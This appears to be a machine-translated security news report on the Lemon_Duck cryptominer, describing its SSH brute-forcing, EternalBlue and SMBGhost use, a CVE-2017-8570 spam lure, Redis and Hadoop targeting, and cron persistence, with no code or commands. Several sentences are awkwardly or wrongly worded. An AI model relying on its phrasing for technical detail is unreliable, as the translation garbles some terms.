The Lemon_Duck cryptomining malware has been upgraded so that it can be breached Linux systems (via SSH brute force attacks), to take advantage of systems vulnerable to SMBGhost vulnerability and to infect servers running Redis and Hadoop.
Lemon_Duck cryptomining malware, detected last year by Trend Micro and was further examined by SentinelOne, usually targets corporate networks, gaining access to the service MS SQL via brute-force or SMB protocol using EternalBlue exploit.
Once it successfully infects a device, the malware installs one XMRig Monero (XMR) CPU miner payload that uses the resources of the compromised system to extract cryptocurrency for Lemon_Duck operators.
Lemon_Duck cryptomining malware searches for Linux systems and cloud applications
To find Linux devices that can infect through SSH brute force attacks, Lemon_Duck uses a door scan unit, looking for Linux systems connected to Internet, with exposed TCP port 22 used for SSH Remote Login.
"When he finds them, an SSH brute force begins attack on these machines, with the username root and a list of passwords ", said the researcher security of Sophos, Rajesh Nataraj. "If the attack is successful, the attackers download and execute malicious code."
To ensure that the malware will survive between system reboots, the cron job is added.
Also, Lemon_Duck has the ability to neutralizes other cryptominers that may be installed on Linux systems, to make sure that only its operators can steal cryptocurrencies.
The Lemon_Duck cryptomining malware upgraded for new attacks
The cryptojacker is also distributed on a large scale COVID-19-themed campaign spam. Malware uses one RTF exploit targeting its remote code execution vulnerability Microsoft products Office (RCE) CVE-2017-8570, to deliver the malicious payload.
Recently, Lemon_Duck operators added a vulnerability SMBGhost (CVE-2020-0796) of Windows.
However, instead of exploiting this vulnerability to execute malware, malware operators use it to collect information about compromised computers.
For about two months, between June and August, the hackers behind the Lemon Duck cryptomining malware disabled the EternalBlue and Mimikatz functions, most likely to see the effectiveness of SMBGhost.
After developing the XMRig miner on the compromised devices, the malware will try to disable SMBv3 and block SMB ports 445 and 135 to prevent others from exploiting infected, vulnerable systems.
In addition, the operators of Lemon_Duck cryptomining malware have added support for scanning and breaching servers with exposed Redis (REmote DIctionary Server) databases and Hadoop clusters, which are managed using YARN (Yet Another Resource Negotiator).
“Lemon_Duck cryptomining malware is one of the most advanced types of cryptojacker payloads", Explained the security researcher of Sophos Rajesh Nataraj.
"Its creators are constantly updating the code with new techniques to avoid detection and the miner himself is fileless, which means that it leaves no traces in the file system of the victim ".